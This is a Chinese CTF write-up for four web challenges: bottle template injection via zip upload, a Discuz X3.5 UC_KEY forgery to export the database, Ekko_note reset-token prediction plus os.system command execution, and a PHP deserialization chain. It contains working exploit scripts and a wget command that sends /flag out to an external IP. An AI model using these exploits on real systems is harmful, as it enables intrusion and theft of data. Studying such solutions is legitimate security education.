ez_bottle
源码
from bottle import route, run, template, post, request, static_file, error
import os
import zipfile
import hashlib
import time
# hint: flag in /flag , have a try
UPLOAD_DIR = os.path.join(os.path.dirname(__file__), 'uploads')
os.makedirs(UPLOAD_DIR, exist_ok=True)
STATIC_DIR = os.path.join(os.path.dirname(__file__), 'static')
MAX_FILE_SIZE = 1 * 1024 * 1024
BLACK_DICT = ["{", "}", "os", "eval", "exec", "sock", "<", ">", "bul", "class", "?", ":", "bash", "_", "globals",
"get", "open"]
def contains_blacklist(content):
return any(black in content for black in BLACK_DICT)
def is_symlink(zipinfo):
return (zipinfo.external_attr >> 16) & 0o170000 == 0o120000
def is_safe_path(base_dir, target_path):
return os.path.realpath(target_path).startswith(os.path.realpath(base_dir))
@route('/')
def index():
return static_file('index.html', root=STATIC_DIR)
@route('/static/<filename>')
def server_static(filename):
return static_file(filename, root=STATIC_DIR)
@route('/upload')
def upload_page():
return static_file('upload.html', root=STATIC_DIR)
@post('/upload')
def upload():
zip_file = request.files.get('file')
if not zip_file or not zip_file.filename.endswith('.zip'):
return 'Invalid file. Please upload a ZIP file.'
if len(zip_file.file.read()) > MAX_FILE_SIZE:
return 'File size exceeds 1MB. Please upload a smaller ZIP file.'
zip_file.file.seek(0)
current_time = str(time.time())
unique_string = zip_file.filename + current_time
md5_hash = hashlib.md5(unique_string.encode()).hexdigest()
extract_dir = os.path.join(UPLOAD_DIR, md5_hash)
os.makedirs(extract_dir)
zip_path = os.path.join(extract_dir, 'upload.zip')
zip_file.save(zip_path)
try:
with zipfile.ZipFile(zip_path, 'r') as z:
for file_info in z.infolist():
if is_symlink(file_info):
return 'Symbolic links are not allowed.'
real_dest_path = os.path.realpath(os.path.join(extract_dir, file_info.filename))
if not is_safe_path(extract_dir, real_dest_path):
return 'Path traversal detected.'
z.extractall(extract_dir)
except zipfile.BadZipFile:
return 'Invalid ZIP file.'
files = os.listdir(extract_dir)
files.remove('upload.zip')
return template("文件列表: {{files}}\n访问: /view/{{md5}}/{{first_file}}",
files=", ".join(files), md5=md5_hash, first_file=files[0] if files else "nofile")
@route('/view/<md5>/<filename>')
def view_file(md5, filename):
file_path = os.path.join(UPLOAD_DIR, md5, filename)
if not os.path.exists(file_path):
return "File not found."
with open(file_path, 'r', encoding='utf-8') as f:
content = f.read()
if contains_blacklist(content):
return "you are hacker!!!nonono!!!"
try:
return template(content)
except Exception as e:
return f"Error rendering template: {str(e)}"
@error(404)
def error404(error):
return "bbbbbboooottle"
@error(403)
def error403(error):
return "Forbidden: You don't have permission to access this resource."
if __name__ == '__main__':
run(host='0.0.0.0', port=5000, debug=False)
黑名单
BLACK_DICT = ["{", "}", "os", "eval", "exec", "sock", "<", ">", "bul", "class", "?", ":", "bash", "_", "globals",
"get", "open"]
绕过检测后利用
template(content)
前端没给上传文件的位置,构造exp
import requests
import zipfile
import io
import re
URL = "http://gz.imxbt.cn:20791" # ← 改成题目的实际 URL
# 构造 payload
payload = """% import configparser
% c = configparser.ConfigParser()
% c.read('/flag')
% raise Exception('\\n'.join(c.sections()))"""
# 打包 zip 到内存
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "w", zipfile.ZIP_DEFLATED) as zf:
zf.writestr("exp.tpl", payload)
zip_buffer.seek(0)
# 上传
files = {"file": ("exp.zip", zip_buffer, "application/zip")}
resp = requests.post(URL + "/upload", files=files)
print("[*] Upload response:\n", resp.text)
# 提取 md5 和文件名
m = re.search(r"/view/([0-9a-f]+)/([^ \n]+)", resp.text)
if not m:
print("[-] Upload failed, could not extract view link.")
exit()
md5, fname = m.groups()
print(f"[*] Extracted md5={md5}, fname={fname}")
# 访问 view 页面
resp = requests.get(f"{URL}/view/{md5}/{fname}")
print("[*] View response:\n", resp.text)
payload1
% import configparser
% c = configparser.ConfigParser()
% c.read('/flag')
% raise Exception('\\n'.join(c.sections()))
利用configparser,配置文件解析模块,然后把flag文件当做ini文件解析,然后利用抛出异常去打印出来
payload2
% import fileinput
% a = ''.join(fileinput.input('/flag'))
% raise Exception(a)
利用 fileinput
模块,可以把文件当作输入流逐行读
打开 /flag
文件,把所有内容拼接成一个字符串赋给 a
抛出异常,并把文件内容当成异常信息输出
Payload3
import shutil; shutil.copy('/flag', './aaa')
复制路径下文件内容到另一路径
此题做法还有很多,就不一一列举了
我曾有一份工作
Discuz x3.5
扫描扫到www.zip
下载,代码审计
在/api/source/config/config_ucenter.php
发现泄露了UC_KEY
define('UC_KEY', 'N8ear1n0q4s646UeZeod130eLdlbqfs1BbRd447eq866gaUdmek7v2D9r9EeS6vb');
去搜索一下Discuz x3.5
看到题目提示
一次备份,换来的是一张辞职信
flag 在 pre_a_flag 表里
在pre_a_flag
表内,可能是sql注入?或者是泄露之类的
做法
拿到 UC_KEY → 生成 code → 调用 export → 导出 SQL → 下载
Discuz!/UCenter 的 API 请求是靠 code
参数鉴权的
code的生成看源码,最后去触发export
if($get['method'] == 'export') {
$db->query('SET SQL_QUOTE_SHOW_CREATE=0', 'SILENT');
$time = date("Y-m-d H:i:s", $timestamp);
$tables = array();
$tables = arraykeys2(fetchtablelist($tablepre), 'Name');
if($apptype == 'discuz') {
$query = $db->query("SELECT datatables FROM {$tablepre}plugins WHERE datatables<>''");
while($plugin = $db->fetch_array($query)) {
foreach(explode(',', $plugin['datatables']) as $table) {
if($table = trim($table)) {
$tables[] = $table;
}
}
}
}
if($apptype == 'discuzx') {
$query = $db->query("SELECT datatables FROM {$tablepre}common_plugin WHERE datatables<>''");
while($plugin = $db->fetch_array($query)) {
foreach(explode(',', $plugin['datatables']) as $table) {
if($table = trim($table)) {
$tables[] = $table;
}
}
}
}
$memberexist = array_search("{$tablepre}common_member", $tables);
if($memberexist !== FALSE) {
unset($tables[$memberexist]);
array_unshift($tables, "{$tablepre}common_member");
}
$get['volume'] = isset($get['volume']) ? intval($get['volume']) : 0;
$get['volume'] = $get['volume'] + 1;
$version = $version ? $version : $apptype;
$idstring = '# Identify: '.base64_encode("$timestamp,$version,$apptype,multivol,{$get['volume']}")."\n";
if(!isset($get['sqlpath']) || empty($get['sqlpath'])) {
$get['sqlpath'] = 'backup_'.date('ymd', $timestamp).'_'.random(6);
if(!mkdir(BACKUP_DIR.'./'.$get['sqlpath'], 0777)) {
api_msg('mkdir_error', 'make dir error:'.BACKUP_DIR.'./'.$get['sqlpath']);
}
} else {
$get['sqlpath'] = str_replace(array('/', '\\', '.', "'"), '', $get['sqlpath']);
if(!is_dir(BACKUP_DIR.'./'.$get['sqlpath'])) {
if(!mkdir(BACKUP_DIR.'./'.$get['sqlpath'], 0777)) {
api_msg('mkdir_error', 'make dir error:'.BACKUP_DIR.'./'.$get['sqlpath']);
}
}
}
if(!isset($get['backupfilename']) || empty($get['backupfilename'])) {
$get['backupfilename'] = date('ymd', $timestamp).'_'.random(6);
}
$sqldump = '';
$get['tableid'] = isset($get['tableid']) ? intval($get['tableid']) : 0;
$get['startfrom'] = isset($get['startfrom']) ? intval($get['startfrom']) : 0;
if(!$get['tableid'] && $get['volume'] == 1) {
foreach($tables as $table) {
$sqldump .= sqldumptablestruct($table);
}
}
备份文件会被写到
BACKUP_DIR . '/' . $sqlpath . '/' . $backupfilename . '.sql'
BACKUP_DIR在 **Discuz! X 默认配置**里是
./data/backup_uc/
这个目录本质上是 Web 可访问的目录(就在站点根目录的 data/
下)
同时文件具有可访问性,所以可以看到返回路径就可下载下来
伪造code
<?php
define('UC_KEY', 'N8ear1n0q4s646UeZeod130eLdlbqfs1BbRd447eq866gaUdmek7v2D9r9EeS6vb');
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if(((int)substr($result, 0, 10) == 0 || (int)substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) === substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
function encode_arr($get) {
$tmp = '';
foreach($get as $key => $val) {
$tmp .= '&'.$key.'='.$val;
}
return _authcode($tmp, 'ENCODE', UC_KEY);
}
$get = array('time'=>time(),'method'=>'export');
$res = encode_arr($get);
echo $res;
下载下来文件后
hex解码即可
Ekko_note
源码
# -*- encoding: utf-8 -*-
'''
@File : app.py
@Time : 2066/07/05 19:20:29
@Author : Ekko exec inc. 某牛马程序员
'''
import os
import time
import uuid
import requests
from functools import wraps
from datetime import datetime
from secrets import token_urlsafe
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, render_template, redirect, url_for, request, flash, session
SERVER_START_TIME = time.time()
# 欸我艹这两行代码测试用的忘记删了,欸算了都发布了,我们都在用力地活着,跟我的下班说去吧。
# 反正整个程序没有一个地方用到random库。应该没有什么问题。
import random
random.seed(SERVER_START_TIME)
admin_super_strong_password = token_urlsafe()
app = Flask(__name__)
app.config['SECRET_KEY'] = 'your-secret-key-here'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20), unique=True, nullable=False)
email = db.Column(db.String(120), unique=True, nullable=False)
password = db.Column(db.String(60), nullable=False)
is_admin = db.Column(db.Boolean, default=False)
time_api = db.Column(db.String(200), default='https://api.uuni.cn//api/time')
class PasswordResetToken(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
token = db.Column(db.String(36), unique=True, nullable=False)
used = db.Column(db.Boolean, default=False)
def padding(input_string):
byte_string = input_string.encode('utf-8')
if len(byte_string) > 6: byte_string = byte_string[:6]
padded_byte_string = byte_string.ljust(6, b'\x00')
padded_int = int.from_bytes(padded_byte_string, byteorder='big')
return padded_int
with app.app_context():
db.create_all()
if not User.query.filter_by(username='admin').first():
admin = User(
username='admin',
email='admin@example.com',
password=generate_password_hash(admin_super_strong_password),
is_admin=True
)
db.session.add(admin)
db.session.commit()
def login_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'user_id' not in session:
flash('请登录', 'danger')
return redirect(url_for('login'))
return f(*args, **kwargs)
return decorated_function
def admin_required(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if 'user_id' not in session:
flash('请登录', 'danger')
return redirect(url_for('login'))
user = User.query.get(session['user_id'])
if not user.is_admin:
flash('你不是admin', 'danger')
return redirect(url_for('home'))
return f(*args, **kwargs)
return decorated_function
def check_time_api():
user = User.query.get(session['user_id'])
try:
response = requests.get(user.time_api)
data = response.json()
datetime_str = data.get('date')
if datetime_str:
print(datetime_str)
current_time = datetime.fromisoformat(datetime_str)
return current_time.year >= 2066
except Exception as e:
return None
return None
@app.route('/')
def home():
return render_template('home.html')
@app.route('/server_info')
@login_required
def server_info():
return {
'server_start_time': SERVER_START_TIME,
'current_time': time.time()
}
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form.get('username')
email = request.form.get('email')
password = request.form.get('password')
confirm_password = request.form.get('confirm_password')
if password != confirm_password:
flash('密码错误', 'danger')
return redirect(url_for('register'))
existing_user = User.query.filter_by(username=username).first()
if existing_user:
flash('已经存在这个用户了', 'danger')
return redirect(url_for('register'))
existing_email = User.query.filter_by(email=email).first()
if existing_email:
flash('这个邮箱已经被注册了', 'danger')
return redirect(url_for('register'))
hashed_password = generate_password_hash(password)
new_user = User(username=username, email=email, password=hashed_password)
db.session.add(new_user)
db.session.commit()
flash('注册成功,请登录', 'success')
return redirect(url_for('login'))
return render_template('register.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
user = User.query.filter_by(username=username).first()
if user and check_password_hash(user.password, password):
session['user_id'] = user.id
session['username'] = user.username
session['is_admin'] = user.is_admin
flash('登陆成功,欢迎!', 'success')
return redirect(url_for('dashboard'))
else:
flash('用户名或密码错误!', 'danger')
return redirect(url_for('login'))
return render_template('login.html')
@app.route('/logout')
@login_required
def logout():
session.clear()
flash('成功登出', 'info')
return redirect(url_for('home'))
@app.route('/dashboard')
@login_required
def dashboard():
return render_template('dashboard.html')
@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
if request.method == 'POST':
email = request.form.get('email')
user = User.query.filter_by(email=email).first()
if user:
# 选哪个UUID版本好呢,好头疼 >_<
# UUID v8吧,看起来版本比较新
token = str(uuid.uuid8(a=padding(user.username))) # 可以自定义参数吗原来,那把username放进去吧
reset_token = PasswordResetToken(user_id=user.id, token=token)
db.session.add(reset_token)
db.session.commit()
# TODO:写一个SMTP服务把token发出去
flash(f'密码恢复token已经发送,请检查你的邮箱', 'info')
return redirect(url_for('reset_password'))
else:
flash('没有找到该邮箱对应的注册账户', 'danger')
return redirect(url_for('forgot_password'))
return render_template('forgot_password.html')
@app.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
if request.method == 'POST':
token = request.form.get('token')
new_password = request.form.get('new_password')
confirm_password = request.form.get('confirm_password')
if new_password != confirm_password:
flash('密码不匹配', 'danger')
return redirect(url_for('reset_password'))
reset_token = PasswordResetToken.query.filter_by(token=token, used=False).first()
if reset_token:
user = User.query.get(reset_token.user_id)
user.password = generate_password_hash(new_password)
reset_token.used = True
db.session.commit()
flash('成功重置密码!请重新登录', 'success')
return redirect(url_for('login'))
else:
flash('无效或过期的token', 'danger')
return redirect(url_for('reset_password'))
return render_template('reset_password.html')
@app.route('/execute_command', methods=['GET', 'POST'])
@login_required
def execute_command():
result = check_time_api()
if result is None:
flash("API死了啦,都你害的啦。", "danger")
return redirect(url_for('dashboard'))
if not result:
flash('2066年才完工哈,你可以穿越到2066年看看', 'danger')
return redirect(url_for('dashboard'))
if request.method == 'POST':
command = request.form.get('command')
os.system(command) # 什么?你说安全?不是,都说了还没完工催什么。
return redirect(url_for('execute_command'))
return render_template('execute_command.html')
@app.route('/admin/settings', methods=['GET', 'POST'])
@admin_required
def admin_settings():
user = User.query.get(session['user_id'])
if request.method == 'POST':
new_api = request.form.get('time_api')
user.time_api = new_api
db.session.commit()
flash('成功更新API!', 'success')
return redirect(url_for('admin_settings'))
return render_template('admin_settings.html', time_api=user.time_api)
if __name__ == '__main__':
app.run(debug=False, host="0.0.0.0")
大概审计一下,就是先要获得admin身份,就需要伪造token,然后我们可以修改admin的密码,就可以获得管理员身份了
最后得是2066年后的去访问,然后就可以利用os.system去读取flag文件了,关键在于token怎么弄
看到token的生成逻辑
if user:
# 选哪个UUID版本好呢,好头疼 >_<
# UUID v8吧,看起来版本比较新
token = str(uuid.uuid8(a=padding(user.username))) # 可以自定义参数吗原来,那把username放进去吧
reset_token = PasswordResetToken(user_id=user.id, token=token)
db.session.add(reset_token)
db.session.commit()
# TODO:写一个SMTP服务把token发出去
flash(f'密码恢复token已经发送,请检查你的邮箱', 'info')
return redirect(url_for('reset_password'))
uuid.uuid8(),同时参数a利用到了padding函数,跟进
def padding(input_string):
byte_string = input_string.encode('utf-8')
if len(byte_string) > 6: byte_string = byte_string[:6]
padded_byte_string = byte_string.ljust(6, b'\x00')
padded_int = int.from_bytes(padded_byte_string, byteorder='big')
return padded_int
翻阅官方文档可以看到,在python3.14版本后
uuid.uuid8(a=None, b=None, c=None)
a: 一个 48 位的整数。
b: 一个 16 位的整数。
c: 一个 64 位的整数。
如果没有指定参数,则是使用的random库,其中seed我们可以得到
不难看到
SERVER_START_TIME = time.time()
@app.route('/server_info')
@login_required
def server_info():
return {
'server_start_time': SERVER_START_TIME,
'current_time': time.time()
然后在源码中可以看到admin邮箱
admin@example.com
然后写脚本伪造token
import random
import uuid
def padding(input_string: str) -> int:
"""必须与服务端保持一致"""
byte_string = input_string.encode('utf-8')
if len(byte_string) > 6:
byte_string = byte_string[:6]
padded_byte_string = byte_string.ljust(6, b'\x00')
padded_int = int.from_bytes(padded_byte_string, byteorder='big')
return padded_int
def predict_reset_token(server_start_time: float, username: str) -> str:
"""
根据已知 server_start_time + username 预测 UUIDv8 token
"""
# 让本地 random 和服务器保持一致
random.seed(server_start_time)
# username → padding → a 参数
a_param = padding(username)
# b 和 c 参数由 random 决定(因为服务端没指定)
token = str(uuid.uuid8(a=a_param))
return token
if __name__ == "__main__":
# 从 /server_info 得到的 server_start_time
server_start_time = 1755797128.8635294
username = "admin"
token = predict_reset_token(server_start_time, username)
print("[*] Predicted reset token:")
print(token)
然后修改admin密码即可
然后需要时间2066年之后的,用vps搭一个即可
通过修改时间api获取使用权
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
# 返回固定的 2066 年的时间
response = {"date": "2066-01-01T00:00:00"}
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps(response).encode())
if __name__ == "__main__":
server_address = ("0.0.0.0", 8000) # 在 VPS 上监听 8000 端口
httpd = HTTPServer(server_address, MyHandler)
print("Serving on port 8000...")
httpd.serve_forever()
然后就可以输入命令去读了
wget "http://38.55.99.179:8000?data=$(cat /flag | base64 -w 0)"
Your Uns3r
源码
<?php
highlight_file(__FILE__);
class User
{
public $username;
public $value;
public function exec()
{
$ser = unserialize(serialize(unserialize($this->value)));
if ($ser != $this->value && $ser instanceof Access) {
include($ser->getToken());
}
}
public function __destruct()
{
if ($this->username == "admin") {
$this->exec();
}
}
}
class Access
{
protected $prefix;
protected $suffix;
public function getToken()
{
if (!is_string($this->prefix) || !is_string($this->suffix)) {
throw new Exception("Go to HELL!");
}
$result = $this->prefix . 'lilctf' . $this->suffix;
if (strpos($result, 'pearcmd') !== false) {
throw new Exception("Can I have peachcmd?");
}
return $result;
}
}
$ser = $_POST["user"];
if (strpos($ser, 'admin') !== false && strpos($ser, 'Access":') !== false) {
exit ("no way!!!!");
}
$user = unserialize($ser);
throw new Exception("nonono!!!");
考点GC回收机制,目录拼接,还有字符串检测绕过(可十六进制绕过)
<?php
class User
{
public $username;
public $value;
}
class Access
{
protected $prefix='/';
protected $suffix='/../flag';
}
$a=new Access();
$b=new User();
$b->username=true;
$b->value=serialize($a);
$d=array($b,0);
$c=serialize($d);
echo "\n";
$e=str_replace('i:1;i:0;','i:0;i:0;',$c);
echo "\n";
echo urlencode($e);
User->value
存放 Access
的序列化结果(保证二次反序列化时能得到 Access 对象)
构造数组并篡改索引,让 User
在反序列化过程中被覆盖 → 提前执行 __destruct()
在 __destruct()
中触发 exec()
→ 读取 /flag
文件